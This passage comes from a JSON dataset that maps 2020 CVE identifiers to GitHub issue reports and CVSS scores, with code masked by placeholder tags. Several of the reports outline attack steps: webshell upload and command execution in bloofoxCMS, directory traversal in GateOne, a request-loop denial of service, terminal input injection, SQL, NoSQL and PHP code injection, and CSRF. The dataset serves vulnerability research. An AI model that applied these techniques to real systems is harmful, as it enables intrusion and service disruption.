        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35490",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2986",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2986",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2020-12-14T21:48:07Z",
        "description": "Block one more gadget type ( , CVE xxxx xxx). (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): Fix will be included in:",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35518",
        "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/4480",
        "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/4480",
        "Repo_new": "389ds/389-ds-base",
        "Issue_Created_At": "2020-12-08T16:04:36Z",
        "description": "Unexpected info returned to ldap request. Issue Description A ldap result can contain additional information. Such information should not allow a client application to guess if an entry exists or not Package Version and Platform: This bug impacts all release after NUMBERTAG Steps to Reproduce to be provided with an automatic testcase Expected results A ldap request should not provide any tips if an entry exists or not",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35579",
        "Issue_Url_old": "https://github.com/tindy2013/subconverter/issues/284",
        "Issue_Url_new": "https://github.com/tindy2013/subconverter/issues/284",
        "Repo_new": "tindy2013/subconverter",
        "Issue_Created_At": "2020-12-19T14:52:24Z",
        "description": "vulnerability] Loop Request\u68c0\u6d4b\u5b58\u5728\u95ee\u9898\uff0c\u53ef\u5b9e\u73b0\u62d2\u7edd\u670d\u52a1\u653b\u51fb / Loop Request detection is too fragile and can realize denial of service attacks.. \u6f0f\u6d1e\u5371\u5bb3 \u901a\u8fc7\u53d1\u9001\u4e00\u4e2a\u8bf7\u6c42\u5230\u670d\u52a1\u5668\uff0c\u5b9e\u73b0\u62d2\u7edd\u670d\u52a1/\u670d\u52a1\u7f13\u6162 \u6f0f\u6d1e\u539f\u7406 \u901a\u8fc7\u7cbe\u5fc3\u6784\u9020\u7684\u8bf7\u6c42\u5934\uff0c\u7ed5\u8fc7 Loop request \u9632\u5fa1\uff0c\u914d\u5408HTTP NUMBERTAG Loop request \u653b\u51fb\u3002 \u8be5\u7a0b\u5e8f\u5b58\u5728\u4e00\u4e2a\u516c\u5f00\u8bbf\u95ee\u7684[\u5916\u90e8API URLTAG : APITAG \u5176\u4e2d\u7684\u4e00\u4e2a\u540d\u4e3a url APITAG url \u7684 GET NUMBERTAG Loop request \u6211\u4eec\u53ef\u4ee5\u6784\u9020\u8fd9\u6837\u7684\u4e00\u4e2aurl\uff0c\u6211\u4eec\u53eb\u5b83 APITAG \uff1a APITAG \u5176\u4e2d APITAG \u4e5f\u662f\u4e00\u4e2aurl\uff0c\u5728\u4efb\u4f55\u65f6\u5019\u5b83\u90fd\u8fd4\u56de\u4e00\u4e2a APITAG \u54cd\u5e94\uff0c\u5c06\u8bf7\u6c42\u91cd\u5b9a\u5411\u5230 APITAG APITAG \u5411\u8be5\u670d\u52a1\u5668\u53d1\u9001\u4e00\u4e2aGET\u8bf7\u6c42\uff0curl\u662f APITAG \uff0c\u670d\u52a1\u5668\u4f1a\u8bf7\u6c42 APITAG \u3002\u7531\u4e8e\u91cd\u5b9a\u5411\uff0c\u670d\u52a1\u5668\u4f1a\u8bbf\u95ee APITAG \uff08\u81ea\u5df1\u8bbf\u95ee\u81ea\u5df1\uff09\uff0c\u9020\u6210 Loop request FILETAG APITAG NUMBERTAG Loop request \u9632\u5fa1 \u8be5\u7a0b\u5e8f\u901a\u8fc7\u68c0\u67e5\u8bf7\u6c42\u5934\u6765\u5b9e\u65bd\u5bf9 Loop request \u653b\u51fb\u7684\u9632\u5fa1\uff1a \u5728\u5411\u5916\u90e8\u53d1\u9001\u8bf7\u6c42\u65f6\uff0c\u4f1a\u5e26\u4e0a\u4e00\u4e2a\u81ea\u5b9a\u4e49\u7684\u8bf7\u6c42\u5934 APITAG \uff1a URLTAG \u901a\u8fc7\u68c0\u67e5\u8bf7\u6c42\u5934\u4e2d\u662f\u5426\u5305\u542b APITAG \uff0c\u4e14\u5b83\u7684\u503c\u662f\u5426\u4e3a APITAG \u6765\u62d2\u7edd Loop request \uff1a URLTAG URLTAG FILETAG \u4f46\u662f\u8be5\u68c0\u6d4b\u65b9\u5f0f\u5b58\u5728\u6f0f\u6d1e\u3002 \u5728\u670d\u52a1\u5668\u53d1\u51fa\u8bf7\u6c42 APITAG \u65f6\uff0c\u4f1a\u987a\u5e26\u5c06\u653b\u51fb\u8005\u8bf7\u6c42 APITAG \u65f6\u53d1\u9001\u7684\u6240\u6709HTTP\u8bf7\u6c42\u5934\u4e5f\u5e26\u4e0a\uff0c\u50cf\u4e0b\u9762\u8fd9\u6837\uff1a FILETAG \u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u7528curl\u8bf7\u6c42 APITAG \uff0c\u5e76\u4e14\u5305\u542b\u4e00\u4e2a\u53eb\u505a APITAG \u7684\u8bf7\u6c42\u5934\uff0c\u4f46\u662f\u503c\u4e0d\u662f APITAG \uff0c\u800c\u662f APITAG \uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5f97\u5230\uff0c\u4e24\u4e2a APITAG \ud83d\udca5\ud83d\udca5 FILETAG \u7a0b\u5e8f\u4f7f\u7528libev\u7684 evhttp_find_header URLTAG APITAG APITAG \u7684\u503c\u88ab\u6211\u4eec\u8986\u76d6\u6210\u4e86 APITAG \uff0c\u4ece\u800c\u7ed5\u8fc7\u4e86 Loop request NUMBERTAG FILETAG \u4e0b\u8f7d\u53d1\u5e03\u7684\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u5728\u672c\u5730\u542f\u52a8\u4e00\u4e2a\u670d\u52a1\u7a0b\u5e8f\uff1a APITAG NUMBERTAG APITAG \uff1a URLTAG \u5176\u4e2d APITAG \u662f\u4e00\u4e2a\u77ed\u94fe\u63a5\u670d\u52a1\uff1a URLTAG NUMBERTAG APITAG \uff1a CODETAG NUMBERTAG APITAG \u8bf7\u6c42\uff1a APITAG \u8be5\u8bf7\u6c42\u53d1\u51fa\u540e\uff0c\u7a0b\u5e8f\u5f00\u59cb\u8fdb\u5165\u65e0\u9650\u7684 Loop Request FILETAG \u6b64\u540e\u65b0\u7684\u8bf7\u6c42\u5230\u6765\u65f6\u8868\u73b0\u4e3a\u8bf7\u6c42\u7f13\u6162\uff0c\u6216\u8005\u62d2\u7edd\u670d\u52a1 \u4fee\u590d\u5efa\u8bae \u53bb\u6389 APITAG \u51fd\u6570\uff0c\u5c06\u68c0\u6d4b\u903b\u8f91\u6539\u6210\u68c0\u6d4b APITAG \u5934\u662f\u5426\u5b58\u5728 URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35597",
        "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/16",
        "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/16",
        "Repo_new": "victoralagwu/cmssite",
        "Issue_Created_At": "2020-12-17T11:42:51Z",
        "description": "SQL Injection vulnerabilities in different features. Following parameters are vulnerable to SQL Injection. I will try to fix these vulnerabilities.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35605",
        "Issue_Url_old": "https://github.com/kovidgoyal/kitty/issues/3128",
        "Issue_Url_new": "https://github.com/kovidgoyal/kitty/issues/3128",
        "Repo_new": "kovidgoyal/kitty",
        "Issue_Created_At": "2020-11-29T06:25:25Z",
        "description": "Input injection via graphic protocol. Describe the bug When attempting to load an image file, the graphic protocol can reply with a message containing the faulty image filename in a decoded form (i.e. not base NUMBERTAG thus allowing for arbitrary input to be inserted. To Reproduce Here is a simple example showing how an attacker could craft a FILETAG file that would cause the execution of arbitrary commands when displayed using cat on kitty. ERRORTAG In Kitty, run APITAG from the shell prompt to perform the input injection ERRORTAG Remark: The other failed commands are caused by the rest of the escape reply. The input sequence ESC+underscore is typically interpreted by readline as the command yank last arg thus causing the last argument of the last command (in that case, that is APITAG to be inserted.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35666",
        "Issue_Url_old": "https://github.com/steedos/steedos-platform/issues/1245",
        "Issue_Url_new": "https://github.com/steedos/steedos-platform/issues/1245",
        "Repo_new": "steedos/steedos-platform",
        "Issue_Created_At": "2020-12-22T02:37:45Z",
        "description": "Mongodb APITAG \u6ce8\u5165\u95ee\u9898. \u63a5\u53e3\u5bf9mongodb nosql\u64cd\u4f5c\u9a8c\u8bc1\u4e0d\u4e25\uff0c\u53ef\u80fd\u5bfc\u81f4nosql\u6ce8\u5165\u3002\u8be6\u7ec6\u53ef\u53c2\u8003 FILETAG \u5927\u591a\u6570\u63a5\u53e3\u5b58\u5728\u9274\u6743\u6240\u4ee5\u672a\u767b\u5f55\u65e0\u6cd5\u5229\u7528\uff0c\u8fd9\u91cc\u4ec5\u4ec5\u4e3e\u4e00\u4e2a\u4f8b\u5b50 \u6f0f\u6d1e\u4ea7\u751f\u539f\u56e0 \u4f8b\u5982\u5728 PATHTAG \u4e2d\uff0c\u5b58\u5728\u5982\u4e0b\u4ee3\u7801\uff1a ERRORTAG APITAG APITAG operator URLTAG \u6784\u9020 X User Id[$ne NUMBERTAG user: {\"$ne NUMBERTAG space_user NUMBERTAG URLTAG \u8fdb\u884cdocker NUMBERTAG CODETAG \u5efa\u8bae\uff1a\u5e94\u8be5\u5728nosql\u64cd\u4f5c\u524d\u9a8c\u8bc1\u53c2\u6570\u7c7b\u578b",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35668",
        "Issue_Url_old": "https://github.com/RedisGraph/RedisGraph/issues/1502",
        "Issue_Url_new": "https://github.com/redisgraph/redisgraph/issues/1502",
        "Repo_new": "redisgraph/redisgraph",
        "Issue_Created_At": "2020-12-21T14:41:21Z",
        "description": "APITAG APITAG Of Service) Bug. Bug impact Redis Graph crashes and server downs Bug explained It's appear that Redis Graph doesn't processes well list of unknown data types. Typing this in the CLI, server crashes: APITAG It also crashes with any invalid values in A . Redis Bug report === REDIS BUG REPORT START: Cut & paste starting from here NUMBERTAG M NUMBERTAG Dec NUMBERTAG Redis NUMBERTAG crashed by signal NUMBERTAG M NUMBERTAG Dec NUMBERTAG Crashed running the instruction at NUMBERTAG f NUMBERTAG a6e NUMBERTAG M NUMBERTAG Dec NUMBERTAG Accessing address NUMBERTAG M NUMBERTAG Dec NUMBERTAG Failed assertion: <no assertion failed> (<no file NUMBERTAG STACK TRACE EIP: PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG a6e NUMBERTAG Backtrace: redis server APITAG redis server APITAG PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG a6e NUMBERTAG PATHTAG APITAG PATHTAG NUMBERTAG b7c7e NUMBERTAG f NUMBERTAG a6e3c7e] PATHTAG APITAG PATHTAG NUMBERTAG b7c7e NUMBERTAG f NUMBERTAG a6e3c7e] PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG NUMBERTAG fb5ad NUMBERTAG f NUMBERTAG a NUMBERTAG ad] PATHTAG NUMBERTAG fa NUMBERTAG f NUMBERTAG b NUMBERTAG fa3] PATHTAG (clone NUMBERTAG f NUMBERTAG f NUMBERTAG b7b NUMBERTAG cf] INFO OUTPUT Server redis_version NUMBERTAG redis_git_sha NUMBERTAG redis_git_dirty NUMBERTAG APITAG redis_mode:standalone APITAG NUMBERTAG linuxkit NUMBERTAG arch_bits NUMBERTAG multiplexing_api:epoll atomicvar_api:atomic builtin gcc_version NUMBERTAG process_id NUMBERTAG APITAG tcp_port NUMBERTAG uptime_in_seconds NUMBERTAG uptime_in_days NUMBERTAG hz NUMBERTAG configured_hz NUMBERTAG lru_clock NUMBERTAG PATHTAG config_file: Clients connected_clients NUMBERTAG APITAG APITAG blocked_clients NUMBERTAG tracking_clients NUMBERTAG clients_in_timeout_table NUMBERTAG Memory used_memory NUMBERTAG used_memory_human NUMBERTAG M used_memory_rss NUMBERTAG used_memory_rss_human NUMBERTAG M used_memory_peak NUMBERTAG used_memory_peak_human NUMBERTAG M used_memory_peak_perc NUMBERTAG used_memory_overhead NUMBERTAG used_memory_startup NUMBERTAG used_memory_dataset NUMBERTAG APITAG allocator_allocated NUMBERTAG allocator_active NUMBERTAG allocator_resident NUMBERTAG APITAG APITAG used_memory_lua NUMBERTAG used_memory_lua_human NUMBERTAG K used_memory_scripts NUMBERTAG used_memory_scripts_human NUMBERTAG B number_of_cached_scripts NUMBERTAG maxmemory NUMBERTAG maxmemory_human NUMBERTAG B maxmemory_policy:noeviction allocator_frag_ratio NUMBERTAG allocator_frag_bytes NUMBERTAG allocator_rss_ratio NUMBERTAG allocator_rss_bytes NUMBERTAG rss_overhead_ratio NUMBERTAG rss_overhead_bytes NUMBERTAG mem_fragmentation_ratio NUMBERTAG APITAG mem_not_counted_for_evict NUMBERTAG mem_replication_backlog NUMBERTAG mem_clients_slaves NUMBERTAG mem_clients_normal NUMBERTAG mem_aof_buffer NUMBERTAG mem_allocator:jemalloc NUMBERTAG active_defrag_running NUMBERTAG lazyfree_pending_objects NUMBERTAG Persistence loading NUMBERTAG rdb_changes_since_last_save NUMBERTAG rdb_bgsave_in_progress NUMBERTAG rdb_last_save_time NUMBERTAG rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec NUMBERTAG rdb_current_bgsave_time_sec NUMBERTAG rdb_last_cow_size NUMBERTAG aof_enabled NUMBERTAG aof_rewrite_in_progress NUMBERTAG aof_rewrite_scheduled NUMBERTAG aof_last_rewrite_time_sec NUMBERTAG aof_current_rewrite_time_sec NUMBERTAG aof_last_bgrewrite_status:ok aof_last_write_status:ok aof_last_cow_size NUMBERTAG module_fork_in_progress NUMBERTAG module_fork_last_cow_size NUMBERTAG Stats total_connections_received NUMBERTAG total_commands_processed NUMBERTAG instantaneous_ops_per_sec NUMBERTAG total_net_input_bytes NUMBERTAG total_net_output_bytes NUMBERTAG APITAG APITAG rejected_connections NUMBERTAG sync_full NUMBERTAG sync_partial_ok NUMBERTAG sync_partial_err NUMBERTAG expired_keys NUMBERTAG expired_stale_perc NUMBERTAG APITAG APITAG evicted_keys NUMBERTAG keyspace_hits NUMBERTAG keyspace_misses NUMBERTAG pubsub_channels NUMBERTAG pubsub_patterns NUMBERTAG latest_fork_usec NUMBERTAG migrate_cached_sockets NUMBERTAG slave_expires_tracked_keys NUMBERTAG active_defrag_hits NUMBERTAG active_defrag_misses NUMBERTAG active_defrag_key_hits NUMBERTAG active_defrag_key_misses NUMBERTAG tracking_total_keys NUMBERTAG tracking_total_items NUMBERTAG tracking_total_prefixes NUMBERTAG unexpected_error_replies NUMBERTAG Replication role:master connected_slaves NUMBERTAG APITAG APITAG master_repl_offset NUMBERTAG second_repl_offset NUMBERTAG repl_backlog_active NUMBERTAG repl_backlog_size NUMBERTAG APITAG repl_backlog_histlen NUMBERTAG CPU APITAG APITAG APITAG APITAG Modules APITAG Commandstats APITAG Cluster cluster_enabled NUMBERTAG Keyspace APITAG CLIENT LIST OUTPUT id NUMBERTAG APITAG fd NUMBERTAG name= age NUMBERTAG idle NUMBERTAG flags=b db NUMBERTAG sub NUMBERTAG psub NUMBERTAG multi NUMBERTAG qbuf NUMBERTAG qbuf free NUMBERTAG obl NUMBERTAG oll NUMBERTAG omem NUMBERTAG events=r APITAG user=default REGISTERS NUMBERTAG M NUMBERTAG Dec NUMBERTAG RA NUMBERTAG RB NUMBERTAG f NUMBERTAG f NUMBERTAG RC NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG RD NUMBERTAG f NUMBERTAG ab0 RDI NUMBERTAG a0 RSI NUMBERTAG RBP NUMBERTAG RSP NUMBERTAG f NUMBERTAG f0 R NUMBERTAG R NUMBERTAG f R NUMBERTAG R NUMBERTAG f NUMBERTAG f NUMBERTAG R NUMBERTAG R NUMBERTAG f NUMBERTAG b NUMBERTAG d9f8 R NUMBERTAG R NUMBERTAG RIP NUMBERTAG f NUMBERTAG a6e NUMBERTAG EFL NUMBERTAG CSGSFS NUMBERTAG b NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG ab NUMBERTAG e NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fe NUMBERTAG f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fd NUMBERTAG f NUMBERTAG a6e3c7e NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fc NUMBERTAG f NUMBERTAG f1c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fb NUMBERTAG f NUMBERTAG a6e NUMBERTAG c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fa NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG d9f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f1c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG adb3ba NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f1c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG e NUMBERTAG c6f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG ab NUMBERTAG e NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG MODULES INFO OUTPUT graph_executing commands FAST MEMORY TEST NUMBERTAG M NUMBERTAG Dec NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG Dec NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG Dec NUMBERTAG Bio thread for job type NUMBERTAG terminated Preparing to test memory region NUMBERTAG e NUMBERTAG eae NUMBERTAG bytes) Preparing to test memory region NUMBERTAG e NUMBERTAG bf NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG aa NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d2a NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d2c NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG adfd NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG ae NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b6b NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b NUMBERTAG c NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bb NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bdad NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bdda NUMBERTAG bytes) .O.O.O.O.O.O.O.O.%",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35700",
        "Issue_Url_old": "https://github.com/librenms/librenms/issues/12405",
        "Issue_Url_new": "https://github.com/librenms/librenms/issues/12405",
        "Repo_new": "librenms/librenms",
        "Issue_Created_At": "2020-12-22T14:03:39Z",
        "description": "security issue. Hi, can I please get a point of contact to report a security issue? The email address EMAILTAG rg is bouncing. Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35701",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/4022",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/4022",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-12-24T15:37:03Z",
        "description": "SQL Injection in FILETAG . Describe the bug Due to a lack of validation, FILETAG can be the source of a SQL injection. Expected behavior Cacti should be safe from SQL injections",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35709",
        "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/7",
        "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/7",
        "Repo_new": "alexlang24/bloofoxcms",
        "Issue_Created_At": "2020-12-25T13:27:07Z",
        "description": "An arbitrary file upload vulnerability was found. I want to report an arbitrary file upload vulnerability that I found in bloofoxcms NUMBERTAG through which we can upload webshell and control the web server. After entering the web management background, we can use the upload function to upload files\uff1a FILETAG We create a new webshell file and name it FILETAG \uff1a APITAG Click to select this APITAG : FILETAG Click upload file(s) and grab the data package: FILETAG First request package: ERRORTAG First response package \uff1a CODETAG Then we follow NUMBERTAG redirection\uff0c Second request package \uff1a CODETAG Second response package \uff1a ERRORTAG We can see that the file has been successfully uploaded to PATHTAG FILETAG Finally, we can access the webshell address and execute any command\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-35711",
        "Issue_Url_old": "https://github.com/vorner/arc-swap/issues/45",
        "Issue_Url_new": "https://github.com/vorner/arc-swap/issues/45",
        "Repo_new": "vorner/arc-swap",
        "Issue_Created_At": "2020-12-10T03:13:06Z",
        "description": "APITAG dereferences to a dangling pointer. Hello fellow Rustacean, we APITAG group APITAG gatech) are scanning Rust code on crates.io for potential memory safety and soundness bugs and found an issue in this crate which allows safe Rust code to exhibit an undefined behavior. Issue Description URLTAG URLTAG As noted in the comment, unsafe code in APITAG expects the underlying guard type to dereferences to the same value even when the guard object is moved. However, Map uses Access as a trait bound which does not guarantee this property. As a result, Map accesses a dangling pointer when it is used with an Access implementation that does not dereferences to the same value when moved. URLTAG Constant seems to be the only type in this crate that implements Access in this way, but there can be other user types that implements Access on their own. Reproduction Below is an example program that segfaults, written only with safe APIs of APITAG . APITAG Detail APITAG APITAG ERRORTAG Output: CODETAG Tested Environment Crate: arc swap Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35734",
        "Issue_Url_old": "https://github.com/sruupl/batflat/issues/98",
        "Issue_Url_new": "https://github.com/sruupl/batflat/issues/98",
        "Repo_new": "sruupl/batflat",
        "Issue_Created_At": "2021-01-20T13:41:48Z",
        "description": "Code injection vulnerability in Batflat NUMBERTAG Users tab. Users tab attributes aren't sanitized and some of them allow for code injection. This means that an authenticated user with access to Users tab can execute arbitrary code on the web server with application privileges. Adding user with PHP code in APITAG name\" field: FILETAG PHP being executed: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-35736",
        "Issue_Url_old": "https://github.com/liftoff/GateOne/issues/747",
        "Issue_Url_new": "https://github.com/liftoff/gateone/issues/747",
        "Repo_new": "liftoff/gateone",
        "Issue_Created_At": "2020-12-27T09:05:04Z",
        "description": "An Arbitrary File Download Vulnerability. Gateone has a vulnerability that allows arbitrary file download without authentication, which can traverse the directory and read arbitrary files on the target system. > Code auditing View the file FILETAG In line NUMBERTAG you can find the place to set the handlers, FILETAG You can see that _downloads/_ did not use the APITAG that comes with Tornado, but the method written by the author himself, which may have vulnerabilities. You can find the definition of the get method on line NUMBERTAG ERRORTAG Pay attention to the key part. You can see that the path is spelled into filepath without any filtering. There is directory traversal, and any file can be read. FILETAG > Recurrence of vulnerability Use the official docker image to build the test environment NUMBERTAG Pull image APITAG NUMBERTAG Run image ERRORTAG After installation, visit URLTAG Just ignore it if the browser may report that it is not safe. FILETAG Packet capture in the process of browsing, and you can successfully read the file PATHTAG by visiting URLTAG . FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35738",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/91",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/91",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2020-12-27T18:52:53Z",
        "description": "APITAG crashes with SEGFAULT. Hello! This bug was found by Crusher (fuzzer developing in ISP RAS), thanks to following colleagues: Akolzin Vitalii, Shamil Kurmangaleev, Maxim Mishechkin, Fedor Nis'kov, Ivan Gulakov, Denis Straghkov, Andrey Fedotov, Alexey Vishnyakov, Daniil Kutz, Alexander Novikov. Product version Commit APITAG (latest commit on master at current moment). Environment Ubuntu NUMBERTAG To reproduce NUMBERTAG Extract APITAG from FILETAG Run: APITAG Program crashes with SEGFAULT. Error message: CODETAG Valgrind output: ERRORTAG Analysis NUMBERTAG In URLTAG malloc 's argument overflows APITAG type and results in small positive number. So, only a short memory region is allocated NUMBERTAG Then URLTAG dptr now points to address in previously allocated region NUMBERTAG Finally URLTAG we write in memory by dptr pointer. But in one moment dptr points to memory outside of allocated region. Segmentation fault.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 4.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-35759",
        "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/10",
        "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/10",
        "Repo_new": "alexlang24/bloofoxcms",
        "Issue_Created_At": "2020-12-27T11:02:09Z",
        "description": "CSRF Attack that leads to edit any file content APITAG I discovered a CSRF Vulnerability in APITAG , the request validation was not there to avoid CSRF Attacks. APITAG : ERRORTAG Impact Change any file content in webserver APITAG Fix Synchronizer Token Pattern URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-35760",
        "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/9",
        "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/9",
        "Repo_new": "alexlang24/bloofoxcms",
        "Issue_Created_At": "2020-12-27T10:31:18Z",
        "description": "Authenticated Unrestricted File Upload in 'profile' action. I found Unrestricted File Upload in APITAG > filename param, the filename param only checks the MIME type which that can be bypassed. APITAG : CODETAG Impact Upload Backdoor PHP Files that leads to control the victim webserver",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
